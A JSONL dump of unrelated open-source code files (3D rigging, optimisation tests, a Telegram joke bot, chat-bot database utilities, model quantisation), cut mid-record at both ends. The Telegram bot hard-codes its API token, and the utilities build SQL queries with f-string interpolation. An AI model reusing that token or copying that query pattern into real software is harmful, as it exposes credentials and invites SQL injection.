#\r\n\t\tself.con_ball.node_con.Properties('Visibility').viewvis.AddExpression(\r\n\t\t\tself.prop_anim.ShowFootCons.FullName\r\n\t\t)\r\n\t\tself.con_toe.node_con.Properties('Visibility').viewvis.AddExpression(\r\n\t\t\tself.prop_anim.ShowFootCons.FullName\r\n\t\t)\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add middling nulls #\r\n\t\t\r\n\t\tif self.add_middlers:\r\n\t\t\t\r\n\t\t\t# create a middling stack under the deformer bunch #\r\n\t\t\tnode_dfm_parent = self.deformer_parent.AddNull(xsi.zMapName('Ankle', 'Custom:DfmPrnt', self.parent.symmetry))\r\n\t\t\tnode_dfm_shadow = node_dfm_parent.AddNull(xsi.zMapName('Ankle', 'Custom:DfmShdw', self.parent.symmetry))\r\n\t\t\tnode_ankle_env = node_dfm_shadow.AddNull(xsi.zMapName('Ankle', 'Env', self.parent.symmetry))\r\n\t\t\tself.deformers.Add(node_ankle_env)\r\n\t\t\r\n\t\t\t# hide the display #\r\n\t\t\txsi.zHide(node_dfm_parent)\r\n\t\t\txsi.zHide(node_dfm_shadow)\r\n\t\t\txsi.zHide(node_ankle_env)\r\n\t\t\t\r\n\t\t\t# add the constraints #\r\n\t\t\tlast_leg_bone = self.root_skel_leg.Bones(self.root_skel_leg.Bones.Count-1)\r\n\t\t\tnode_dfm_parent.Kinematics.AddConstraint('Pose', last_leg_bone, False)\r\n\t\t\tnode_dfm_shadow.Kinematics.AddConstraint('Pose', self.root_foot.Bones(0), False)\r\n\t\t\tcns = node_dfm_shadow.Kinematics.AddConstraint('Pose', last_leg_bone, False)\r\n\t\t\tcns = dispatch(cns)\r\n\t\t\tcns.cnspos.Value = False\r\n\t\t\tcns.cnsscl.Value = False\r\n\t\t\tcns.blendweight.Value = 0.5\r\n\t\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# create a deformer stack #\r\n\t\t\r\n\t\t# foot #\r\n\t\tnode_dfm_parent = self.deformer_parent.AddNull(xsi.zMapName('Foot', 'Custom:DfmPrnt', self.parent.symmetry))\r\n\t\tnode_dfm_shadow = node_dfm_parent.AddNull(xsi.zMapName('Foot', 'Custom:DfmShdw', self.parent.symmetry))\r\n\t\tself.env_foot = node_dfm_shadow.AddNull(xsi.zMapName('Foot', 'Env', self.parent.symmetry))\r\n\t\tself.deformers.Add(self.env_foot)\r\n\t\t\r\n\t\tnode_dfm_parent.primary_icon.Value \t= 0\r\n\t\tnode_dfm_parent.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tnode_dfm_parent.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\tnode_dfm_shadow.primary_icon.Value \t= 0\r\n\t\tnode_dfm_shadow.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tnode_dfm_shadow.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\tself.env_foot.primary_icon.Value \t= 0\r\n\t\tself.env_foot.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tself.env_foot.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\t\r\n\t\tnode_dfm_parent.Kinematics.AddConstraint('Pose', self.root_foot, False)\r\n\t\tnode_dfm_shadow.Kinematics.AddConstraint('Pose', self.root_foot.Bones(0), False)\r\n\r\n\t\t# toe #\r\n\t\tnode_dfm_parent = self.deformer_parent.AddNull(xsi.zMapName('Toe', 'Custom:DfmPrnt', self.parent.symmetry))\r\n\t\tnode_dfm_shadow = node_dfm_parent.AddNull(xsi.zMapName('Toe', 'Custom:DfmShdw', self.parent.symmetry))\r\n\t\tself.env_toe\t= node_dfm_shadow.AddNull(xsi.zMapName('Toe', 'Env', self.parent.symmetry))\r\n\t\tself.deformers.Add(self.env_toe)\r\n\t\t\r\n\t\tnode_dfm_parent.primary_icon.Value \t= 0\r\n\t\tnode_dfm_parent.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tnode_dfm_parent.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\tnode_dfm_shadow.primary_icon.Value \t= 0\r\n\t\tnode_dfm_shadow.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tnode_dfm_shadow.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\tself.env_toe.primary_icon.Value\t\t= 0\r\n\t\tself.env_toe.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tself.env_toe.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\t\r\n\t\tnode_dfm_parent.Kinematics.AddConstraint('Pose', self.root_foot, False)\r\n\t\tnode_dfm_shadow.Kinematics.AddConstraint('Pose', self.root_foot.Bones(1), False)\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add the deformers to the deformers group #\r\n\t\tif self.group_deformers:\r\n\t\t\tself.group_deformers = dispatch(self.group_deformers)\r\n\t\t\tself.group_deformers.AddMember(self.deformers)\r\n\r\n\t\t# # for setup purposes only #\r\n\t\t# # report the class attributes #\r\n\t\t# for key in self.__dict__:\r\n\t\t# \tlog(key)\r\n\t\r\n\t\t\t","repo_name":"nazimba/Zoogloo-Tools","sub_path":"zBuilder/Application/Plugins/zFoot.py","file_name":"zFoot.py","file_ext":"py","file_size_in_byte":47204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9353984050","text":"import copy\n\n\nclass Individual:\n\n def __init__(self, X=None, F=None, CV=None, G=None, feasible=None, **kwargs) -> None:\n self.X = X\n self.F = F\n self.CV = CV\n self.G = G\n self.feasible = feasible\n self.data = kwargs\n self.attr = set(self.__dict__.keys())\n\n def has(self, key):\n return key in self.attr or key in self.data\n\n def set(self, key, value):\n if key in self.attr:\n self.__dict__[key] = value\n else:\n self.data[key] = value\n\n def copy(self):\n ind = copy.copy(self)\n ind.data = self.data.copy()\n return ind\n\n def get(self, *keys):\n\n def _get(key):\n if key in self.data:\n return self.data[key]\n elif key in self.attr:\n return self.__dict__[key]\n else:\n return None\n\n ret = []\n\n for key in keys:\n ret.append(_get(key))\n\n if len(ret) == 1:\n return ret[0]\n else:\n return tuple(ret)\n","repo_name":"AIasd/ADFuzz","sub_path":"pymoo/pymoo/model/individual.py","file_name":"individual.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"34650429388","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport pytest\nfrom golem import *\nfrom olympus.campaigns import Campaign, ParameterSpace\nfrom olympus.objects import (\n ParameterCategorical,\n ParameterContinuous,\n ParameterDiscrete,\n ParameterVector,\n)\nfrom olympus.surfaces import Surface\n\nfrom atlas.planners.gp.planner import GPPlanner\nfrom atlas.utils.golem_utils import get_golem_dists\n\nCONT = {\n \"golem_config\": [\n # param config as dictionaries\n {\n \"name\": \"dicts\",\n \"config\": {\n \"param0\": {\"dist_type\": \"Normal\", \"dist_params\": {\"std\": 0.2}},\n \"param1\": {\"dist_type\": \"Normal\", \"dist_params\": {\"std\": 0.3}},\n },\n },\n # params as Golem distribution objects\n {\n \"name\": \"objects\",\n \"config\": {\n \"param0\": Normal(0.2),\n \"param1\": Normal(0.3),\n },\n },\n # missing parameters\n {\n \"name\": \"missing_param\",\n \"config\": {\n \"param0\": {\"dist_type\": \"Normal\", \"dist_params\": {\"std\": 0.2}},\n },\n },\n # all parameters = Delta(), should return None\n {\n \"name\": \"all_delta\",\n \"config\": {\n \"param0\": {\"dist_type\": \"Delta\", \"dist_params\": None},\n \"param1\": {\"dist_type\": \"Delta\", \"dist_params\": None},\n },\n },\n ]\n}\n\n\n@pytest.mark.parametrize(\"golem_config\", CONT[\"golem_config\"])\ndef test_get_golem_dists_cont(golem_config):\n test_name = golem_config[\"name\"]\n config = golem_config[\"config\"]\n\n param_space = ParameterSpace()\n param_space.add(ParameterContinuous(name=\"param0\"))\n param_space.add(ParameterContinuous(name=\"param1\"))\n\n dists = get_golem_dists(config, param_space)\n\n if test_name in [\"dicts\", \"objects\"]:\n assert all([isinstance(dist, Normal) for dist in dists])\n elif test_name == \"missing_param\":\n assert isinstance(dists[0], Normal)\n assert isinstance(dists[1], Delta)\n elif test_name == \"all_delta\":\n assert dists is None\n\n\n# @pytest.mark.parametrize(\"golem_config\", MIXED[\"golem_config\"])\n# def test_get_golem_dists_mixed(golem_config):\n#\n# test_name = golem_config['name']\n# config = golem_config['config']\n#\n# param_space = ParameterSpace()\n# param_0 = ParameterCategorical(\n# name=\"param_0\",\n# options=[\"x0\", \"x1\", \"x2\"],\n# descriptors=desc_param_0,\n# )\n# param_1 = ParameterDiscrete(\n# name=\"param_1\",\n# options=[0.0, 0.25, 0.5, 0.75, 1.0],\n# )\n# param_2 = ParameterContinuous(\n# name=\"param_2\",\n# low=0.0,\n# high=1.0,\n# )\n# param_3 = ParameterContinuous(\n# name=\"param_3\",\n# low=0.0,\n# high=1.0,\n# )\n# param_space.add(param_0)\n# param_space.add(param_1)\n# param_space.add(param_2)\n# param_space.add(param_3)\n#\n#\n# dists = get_golem_dists(config, param_space)\n\n\ndef test_golem_opt_cont():\n def surface(x):\n return np.sin(8 * x[0]) - 2 * np.cos(6 * x[1]) + np.exp(-2.0 * x[2])\n\n param_space = ParameterSpace()\n param_0 = ParameterContinuous(name=\"param0\", low=0.0, high=1.0)\n param_1 = ParameterContinuous(name=\"param1\", low=0.0, high=1.0)\n param_2 = ParameterContinuous(name=\"param2\", low=0.0, high=1.0)\n param_space.add(param_0)\n param_space.add(param_1)\n param_space.add(param_2)\n\n planner = GPPlanner(\n goal=\"minimize\",\n feas_strategy=\"naive-0\",\n init_design_strategy=\"lhs\",\n num_init_design=5,\n batch_size=1,\n acquisition_type=\"ei\",\n acquisition_optimizer=\"gradient\",\n golem_config={\n \"param0\": Normal(0.2),\n \"param1\": Normal(0.3),\n },\n )\n\n planner.set_param_space(param_space)\n\n campaign = Campaign()\n campaign.set_param_space(param_space)\n\n BUDGET = 10\n\n while len(campaign.observations.get_values()) < BUDGET:\n samples = planner.recommend(campaign.observations)\n for sample in samples:\n sample_arr = sample.to_array()\n measurement = surface(sample_arr)\n campaign.add_observation(sample_arr, measurement)\n\n assert len(campaign.observations.get_params()) == BUDGET\n assert len(campaign.observations.get_values()) == BUDGET\n\n\n# def test_golem_opt_mixed(golem_config):\n# ...\n\n\nif __name__ == \"__main__\":\n # test_get_golem_dists_cont(CONT['golem_config'][0])\n\n test_golem_opt_cont()\n","repo_name":"aspuru-guzik-group/atlas","sub_path":"tests/__TMP_test_golem.py","file_name":"__TMP_test_golem.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"73080529768","text":"import logging\r\nimport requests\r\nfrom aiogram import Bot, Dispatcher, executor, types\r\nfrom aiogram.types import InlineKeyboardMarkup\r\nfrom aiogram.types import InlineKeyboardButton\r\nfrom aiogram.types import reply_keyboard\r\nfrom aiogram.types import InlineKeyboardMarkup, ReplyKeyboardMarkup\r\nfrom aiogram.types import InlineKeyboardButton\r\nfrom aiogram.types import KeyboardButton\r\nimport asyncio\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\nbot = Bot(token='1276910299:AAHzjDM1Z02_eSYBhR5uiB2m2LHtgZnYxrI')\r\ndp = Dispatcher(bot)\r\n\r\n\r\n\r\ntoken = \"1276910299:AAHzjDM1Z02_eSYBhR5uiB2m2LHtgZnYxrI\"\r\nURL = 'https://api.telegram.org/bot' + token + '/'\r\n#https://api.telegram.org/bot1276910299:AAHzjDM1Z02_eSYBhR5uiB2m2LHtgZnYxrI/setWebhook?url=https://dd50f1ea6479.ngrok.io/\r\n\r\nbutton1 = KeyboardButton('Анекдоты')\r\nbutton2 = KeyboardButton('Рассказы')\r\nbutton3 = KeyboardButton('Афоризмы')\r\nbutton4 = KeyboardButton('Цитаты')\r\nbutton5 = KeyboardButton('Тосты')\r\nbutton6 = KeyboardButton('Статусы')\r\nbutton7 = KeyboardButton('Анекдоты (18+)')\r\nbutton8 = KeyboardButton('Рассказы (18+)')\r\nbutton9 = KeyboardButton('Афоризмы (18+)')\r\nbutton10 = KeyboardButton('Цитаты (18+)')\r\nbutton11 = KeyboardButton('Тосты (18+)')\r\nbutton12 = KeyboardButton('Статусы (18+)')\r\nmenu = ReplyKeyboardMarkup(resize_keyboard=True)\r\nmenu.insert(button1)\r\nmenu.insert(button2)\r\nmenu.insert(button3)\r\nmenu.insert(button4)\r\nmenu.insert(button5)\r\nmenu.insert(button6)\r\nmenu.insert(button7)\r\nmenu.insert(button8)\r\nmenu.insert(button9)\r\nmenu.insert(button10)\r\nmenu.insert(button11)\r\nmenu.insert(button12)\r\n# start\r\n@dp.message_handler(commands=['start', 'help'])\r\nasync def process_start_command(message: types.Message):\r\n sticker = open('./welcome_sticker.jpg', 'rb')\r\n await bot.send_sticker(message.chat.id, sticker)\r\n await message.reply(f\"Добрый вечер, {message.from_user.first_name}!\\n\", reply_markup=menu)\r\n\r\n\r\n\r\n@dp.message_handler(content_types=['text'])\r\nasync def get_text_messages(message):\r\n if str(message[\"text\"]) == 'Анекдоты':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(1))\r\n elif str(message[\"text\"]) == 'Рассказы':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(2))\r\n elif str(message[\"text\"]) == 'Афоризмы':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(4))\r\n elif str(message[\"text\"]) == 'Цитаты':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(5))\r\n elif str(message[\"text\"]) == 'Тосты':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(6))\r\n elif str(message[\"text\"]) == 'Статусы':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(8))\r\n elif str(message[\"text\"]) == 'Анекдоты (18+)':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(11))\r\n elif str(message[\"text\"]) == 'Рассказы (18+)':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(12))\r\n elif str(message[\"text\"]) == 'Афоризмы (18+)':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(14))\r\n elif str(message[\"text\"]) == 'Цитаты (18+)':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(15))\r\n elif str(message[\"text\"]) == 'Тосты (18+)':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(16))\r\n elif str(message[\"text\"]) == 'Статусы (18+)':\r\n await bot.send_message(message.chat.id,\r\n get_anekdot(18))\r\n else:\r\n await bot.send_message(message.chat.id,\r\n \"С мамкой своей так будешь базарить.\")\r\n\r\n\r\ndef get_anekdot(n):\r\n #url = 'https://yobit.net/api/2/btc_usd/ticker'\r\n #print(\"Выберите категорию:\\n1 - Анекдот; \\n2 - Рассказы; \\n3 - Стишки;\\n4 - Афоризмы;\\n5 - Цитаты;\\n6 - Тосты;\\n8 - Статусы;\\n11 - Анекдот (+18);\\n12 - Рассказы (+18);\\n13 - Стишки (+18);\\n14 - Афоризмы (+18);\\n15 - Цитаты (+18);\\n16 - Тосты (+18);\\n18 - Статусы (+18);\")\r\n #n=input()\r\n #n=1\r\n url = 'http://rzhunemogu.ru/RandJSON.aspx?CType={}'.format(n)\r\n response = requests.get(url).text\r\n y = response.rfind('\"')\r\n return response[12:y]\r\n\r\n\r\nif __name__ == '__main__':\r\n executor.start_polling(dp, skip_updates=True)\r\n\r\n","repo_name":"madandalone/anekdotbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4755,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71806342568","text":"class Solution(object):\n def checkSubarraySum(self, nums, k):\n sum = [0]*len(nums)\n if len(nums) < 2:\n return False\n sum[0] = nums[0]\n for i in range(1, len(nums)):\n sum[i] = sum[i-1] + nums[i]\n for start in range(len(nums)):\n for j in range(2, len(nums)+1):\n if start+j-1 dict:\n with open(config_file, 'r', encoding='utf-8') as f: # 从json读配置\n config = json.loads(f.read())\n return config\n\n\nconfigs = load_config()\n\n\nasync def get_setting(group_id: int, setting_name: str) -> int:\n \"\"\"\n Return setting from database\n\n Args:\n group_id: group id\n setting_name: setting name\n\n Examples:\n setting = get_setting(12345678, \"repeat\")\n\n Return:\n Operation result\n \"\"\"\n sql = f\"SELECT {setting_name} from setting WHERE groupId={group_id}\"\n data = await execute_sql(sql)\n return data[0][0]\n\n\nasync def random_pic(base_path: str) -> str:\n \"\"\"\n Return random pic path in base_dir\n\n Args:\n base_path: Target library path\n\n Examples:\n pic_path = random_pic(wallpaper_path)\n\n Return:\n str: Target pic path\n \"\"\"\n path_dir = os.listdir(base_path)\n if not path_dir:\n raise ImagePathEmpty()\n path = random.sample(path_dir, 1)[0]\n return base_path + path\n\n\nasync def get_pic(image_type: str) -> MessageChain:\n \"\"\"\n Return random pics message\n\n Args:\n image_type: The type of picture to return\n\n Examples:\n assist_process = await get_pic(\"setu\")[0]\n message = await get_pic(\"real\")[1]\n\n Return:\n [\n str: Auxiliary treatment to be done(Such as add statement),\n MessageChain: Message to be send(MessageChain)\n ]\n \"\"\"\n async def color() -> str:\n if \"setuPath\" in configs.keys():\n base_path = configs[\"setuPath\"]\n else:\n raise ConfigurationNotFound()\n pic_path = await random_pic(base_path)\n return pic_path\n\n async def color18() -> str:\n if \"setu18Path\" in configs.keys():\n base_path = configs[\"setu18Path\"]\n else:\n raise ConfigurationNotFound()\n pic_path = await random_pic(base_path)\n return pic_path\n\n async def real() -> str:\n if \"realPath\" in configs.keys():\n base_path = configs[\"realPath\"]\n else:\n raise ConfigurationNotFound()\n pic_path = await random_pic(base_path)\n return pic_path\n\n async def real_highq() -> str:\n if \"realHighqPath\" in configs.keys():\n base_path = configs[\"realHighqPath\"]\n else:\n raise ConfigurationNotFound()\n pic_path = await random_pic(base_path)\n return pic_path\n\n async def wallpaper() -> str:\n if \"wallpaperPath\" in configs.keys():\n base_path = configs[\"wallpaperPath\"]\n else:\n raise ConfigurationNotFound()\n pic_path = await random_pic(base_path)\n return pic_path\n\n async def sketch() -> str:\n if \"sketchPath\" in configs.keys():\n base_path = configs[\"sketchPath\"]\n else:\n raise ConfigurationNotFound()\n pic_path = await random_pic(base_path)\n return pic_path\n\n switch = {\n \"setu\": color,\n \"setu18\": color18,\n \"real\": real,\n \"realHighq\": real_highq,\n \"bizhi\": wallpaper,\n \"sketch\": sketch\n }\n\n try:\n target_pic_path = await switch[image_type]()\n except ConfigurationNotFound:\n return MessageChain.create([Plain(f\"{image_type}Path参数未配置!请检查配置文件!\")])\n except ImagePathEmpty:\n return MessageChain.create([Plain(f\"{image_type}文件夹为空!请添加图片!\")])\n message = MessageChain.create([\n Image.fromLocalFile(target_pic_path)\n ])\n return message\n\n\nasync def check_group_data_init(group_list: list) -> None:\n sql = \"select groupId from setting\"\n data = await execute_sql(sql)\n group_id = list(chain.from_iterable(data))\n for i in group_list:\n # print(i.id, ':', i.name)\n if i.id not in group_id:\n sql = f\"INSERT INTO setting (groupId) VALUES ({i.id})\"\n await execute_sql(sql)\n sql = f\"INSERT INTO admin (groupId, adminId) VALUES ({i.id}, {configs['hostQQ']})\"\n await execute_sql(sql)\n\n\nasync def get_admin(group_id: int) -> list:\n sql = f\"SELECT adminId from admin WHERE groupId={group_id}\"\n data = await execute_sql(sql)\n admins = list(chain.from_iterable(data))\n return admins\n\n\nasync def update_setting(group_id: int, setting_name: str, new_setting_value) -> None:\n \"\"\"\n Update setting to database\n\n Args:\n group_id: Group id\n setting_name: Setting name\n new_setting_value: New setting value\n\n Examples:\n await update_setting(12345678, \"setu\", True)\n\n Return:\n None\n \"\"\"\n sql = f\"UPDATE setting SET {setting_name}={new_setting_value} WHERE groupId={group_id}\"\n await execute_sql(sql)\n\n\nasync def admin_management(group_id: int, member_id: int, operation: str) -> MessageChain:\n \"\"\"\n Update setting to database\n\n Args:\n group_id: Group id\n member_id: Member id\n operation: add/delete\n\n Examples:\n await admin_manage(12345678, 12345678, \"delete\")\n\n Return:\n None\n \"\"\"\n sql = f\"SELECT * FROM admin WHERE groupId={group_id} and adminId={member_id}\"\n exist = True if await execute_sql(sql) else False\n if operation == \"add\":\n if exist:\n return MessageChain.create([Plain(text=f\"{member_id}已经是群{group_id}的管理员啦!\")])\n else:\n sql = f\"INSERT INTO admin (groupId, adminId) VALUES ({group_id}, {member_id})\"\n await execute_sql(sql)\n return MessageChain.create([Plain(text=f\"{member_id}被设置为群{group_id}的管理员啦!\")])\n elif operation == \"delete\":\n if exist:\n sql = f\"DELETE FROM admin WHERE groupId={group_id} AND adminId={member_id}\"\n await execute_sql(sql)\n return MessageChain.create([Plain(text=f\"{member_id}现在不是群{group_id}的管理员啦!\")])\n else:\n return MessageChain.create([Plain(text=f\"{member_id}本来就不是群{group_id}的管理员哦!\")])\n else:\n return MessageChain.create([Plain(text=f\"operation error: {operation}\")])\n\n\nasync def add_group(group_id: int):\n sql = f\"SELECT * FROM setting WHERE groupId={group_id}\"\n if await execute_sql(sql):\n return None\n else:\n sql = f\"INSERT INTO setting (groupId) VALUES ({group_id})\"\n await execute_sql(sql)\n sql = f\"INSERT INTO admin (groupId, adminId) VALUES ({group_id}, {configs['hostQQ']})\"\n await execute_sql(sql)\n","repo_name":"SAGIRI-kawaii/saya_plugins_collection","sub_path":"modules/ImageSender/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6875,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"53"} +{"seq_id":"70561889769","text":"import sys\nimport nbconvert\nimport nbformat\n\nComplex_Networks = [\n \"leggi_pdb\",\n \"PCM_permute\",\n \"ER_networks\",\n \"real_net_analysis\",\n \"laplacian_lab_07\",\n \"open_network_growth_models\",\n]\n\nPattern_Recognition = [\n \"Pat_Rec_Lab_1\",\n \"SwissRoll_PCA_MDS_LLE_IsoMap_tSNE_UMAP\",\n \"clustering_examples\",\n \"simple_perceptron\",\n \"neuron_class\",\n \"scikit_intro\",\n]\n\nModels = [\n \"bigrams\",\n \"trigrams\",\n \"concatenated_network\",\n \"convolutional_network\",\n \"min-char-rnn\",\n \"GPT\",\n \"gpt_source\",\n 'GAN',\n]\n\nout_notebook = nbformat.v4.new_notebook()\nsubject = sys.argv[1].lower()\noutext = \".pdf\"\nif subject == 'cn':\n files = Complex_Networks\n outfile = 'Complex_Networks'\nelif subject == 'pr':\n files = Pattern_Recognition\n outfile = 'Pattern_Recognition'\nelif subject == 'mnm':\n files = Models\n outfile = 'Models_and_Numerical_Methods'\n outext = \"-LAB.pdf\"\n\nfor file in files:\n temp_notebook = nbformat.read('./src/{}/{}.ipynb'.format(outfile, file), as_version=4)\n out_notebook.cells.extend(temp_notebook.cells)\n\nout_pdf = nbconvert.PDFExporter().from_notebook_node(out_notebook)[0]\nwith open(outfile+outext, 'wb') as f:\n f.write(out_pdf)","repo_name":"Grufoony/Physics_Unibo","sub_path":"make_pdf.py","file_name":"make_pdf.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"8282344495","text":"\"\"\"Display a simple information for the user.\n\"\"\"\nimport tkinter as tk\nimport tkinter.ttk as ttk\nfrom customtkinter import *\n\n\nclass ChildDialogInfo:\n \"\"\"\n Open a child dialog of a tkinter application to inform the user.\n \"\"\"\n\n def __init__(self, parent, title, msg):\n \"\"\"\n Open a child dialog of a tkinter application to choose autoscan settings.\n\n Args:\n parent: the tkinter parent view to use for this window construction.\n title: title of the popup window\n msg: Message to show to the user\n \"\"\"\n self.app = CTkToplevel(parent)\n self.app.resizable(False, False)\n self.app.title(title)\n self.app.bind(\"\", self.destroy)\n appFrame = CTkFrame(self.app)\n self.rvalue = None\n self.parent = parent\n lbl = CTkLabel(appFrame, text=msg)\n lbl.pack(side=tk.TOP, padx=10, pady=10, fill=tk.X)\n appFrame.pack(fill=tk.BOTH)\n try:\n self.app.wait_visibility()\n self.app.transient(parent)\n self.app.focus_force()\n #self.app.grab_set()\n self.app.lift()\n except tk.TclError:\n pass\n\n def show(self):\n \"\"\"Start displaying this window.\"\"\"\n self.app.update()\n\n def destroy(self, _event=None):\n \"\"\"\n Close the window.\n \"\"\"\n # send the data to the parent\n self.rvalue = None\n self.app.destroy()\n","repo_name":"fbarre96/PollenisatorGUI","sub_path":"pollenisatorgui/core/application/dialogs/ChildDialogInfo.py","file_name":"ChildDialogInfo.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3626551787","text":"from copy import deepcopy\nimport math\nfrom typing import List, Optional, Set\nimport warnings\n\nimport torch\n\ntry:\n from torch.linalg import LinAlgError\nexcept:\n LinAlgError = RuntimeError\nimport unfoldNd\n\nfrom brevitas.graph.gpxq import GPxQ\nfrom brevitas.graph.gpxq import gpxq_mode\nfrom brevitas.graph.gpxq import StopFwdException\nfrom brevitas.graph.gpxq import SUPPORTED_CONV_OP\nimport brevitas.nn as qnn\n\n\nclass gptq_mode(gpxq_mode):\n \"\"\"\n Apply GPTQ algorithm https://arxiv.org/abs/2210.17323.\n\n Args:\n model (Module): The model to quantize with GPTQ\n inplace (bool): Wheter to apply GPTQ inplace or perform a deepcopy. Default: True\n use_quant_activations (bool): Wheter to leave quantize activations enabled while performing\n GPTQ. Default: False\n\n Example:\n >>> with torch.no_grad():\n >>> with gptq_mode(model) as gptq:\n >>> gptq_model = gptq.model\n >>> for i in tqdm(range(gptq.num_layers)):\n >>> for img, t in calib_loader:\n >>> img = img.cuda()\n >>> gptq_model(img)\n >>> gptq.update()\n \"\"\"\n\n def __init__(\n self,\n model,\n group_of_parallel_layers: Optional[List[str]] = None,\n inplace: bool = True,\n create_weight_orig: bool = True,\n use_quant_activations: bool = True,\n num_blocks: int = 100,\n return_forward_output: bool = False,\n act_order: bool = False) -> None:\n if not inplace:\n model = deepcopy(model)\n super().__init__(\n model,\n group_of_parallel_layers,\n inplace,\n create_weight_orig,\n use_quant_activations,\n act_order,\n return_forward_output)\n\n self.orig_forward = self.model.forward\n self.model.forward = self.catch_stopfwd\n # How many subblock to use during GPTQ for each layer\n self.num_blocks = num_blocks\n\n def catch_stopfwd(self, *args, **kwargs):\n try:\n self.orig_forward(*args, **kwargs)\n except StopFwdException:\n pass\n finally:\n if self.return_forward_output:\n # If we want to return the output of the network, we need to disable all hooks\n for name, gpxq_class in self.gpxq_layers.items():\n gpxq_class.disable_pre_forward_hook = True\n out = self.orig_forward(*args, **kwargs)\n for name, gpxq_class in self.gpxq_layers.items():\n gpxq_class.disable_pre_forward_hook = False\n return out\n\n def initialize_module_optimizer(\n self, layer, name, act_order, len_parallel_layers, create_weight_orig):\n return GPTQ(\n layer=layer,\n name=name,\n act_order=act_order,\n len_parallel_layers=len_parallel_layers,\n create_weight_orig=create_weight_orig,\n num_blocks=self.num_blocks)\n\n\nclass GPTQ(GPxQ):\n \"\"\"\n Adapted from https://github.com/IST-DASLab/gptq, released under the following LICENSE:\n\n Copyright 2023 IST-DASLab\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n \"\"\"\n\n def __init__(\n self,\n layer,\n name,\n act_order,\n len_parallel_layers=1,\n create_weight_orig=True,\n num_blocks=100) -> None:\n super().__init__(layer, name, act_order, len_parallel_layers, create_weight_orig)\n\n dev = self.layer.weight.device\n\n # Define how many columns to update in each mini-block\n self.blocksize = math.ceil(self.columns / num_blocks)\n\n # Initialize Hessian matrix and counter. We need it in float32 to compute the inverse\n self.H = torch.zeros((self.groups, self.columns, self.columns),\n device=dev,\n dtype=torch.float32)\n self.nsamples = 0\n\n def update_batch(self, module, input, current_layer):\n if self.disable_pre_forward_hook:\n return input\n\n # Update reference to current layer\n current_layer.layer_names.add(self.name)\n inp = self.process_input(input)\n batch_size = inp.shape[0]\n\n # Preprocess the input to compute the Hessian\n if isinstance(self.layer, qnn.QuantLinear):\n if len(inp.shape) > 2:\n inp = inp.reshape((-1, sum(inp.shape[2:])))\n inp = inp.t()\n # For QuantLinear layer, groups will be 1\n inp_processed = inp.unsqueeze(0)\n\n if isinstance(self.layer, SUPPORTED_CONV_OP):\n # Pick the correct unfoldNd class\n if isinstance(self.layer, (qnn.QuantConvTranspose1d, qnn.QuantConvTranspose2d)):\n unfold_impl = unfoldNd.UnfoldTransposeNd\n else:\n unfold_impl = unfoldNd.UnfoldNd\n\n unfold = unfold_impl(\n self.layer.kernel_size,\n dilation=self.layer.dilation,\n padding=self.layer.padding,\n stride=self.layer.stride)\n\n # Split input based on how many groups in convolution\n inp_by_group = torch.chunk(inp, self.groups, 1)\n inp_processed = []\n # Preprocess input by group\n for i, inp in enumerate(inp_by_group):\n inp = unfold(inp)\n inp = inp.transpose(1, 0)\n inp = inp.flatten(1)\n inp_processed.append(inp)\n inp_processed = torch.stack(inp_processed)\n\n # Hessian computation\n self.H *= self.nsamples / (self.nsamples + batch_size)\n self.nsamples += batch_size\n inp_processed = math.sqrt(2 / self.nsamples) * inp_processed.to(torch.float32)\n self.H += inp_processed.bmm(inp_processed.transpose(2, 1))\n # If we are executing GPTQ with group of parallel layers, we keep track of how many forward\n # we executed. Once we executed as many as the number of parallel_layers, we raise\n # StopFwdException\n current_layer.forward_count += 1\n if current_layer.forward_count == 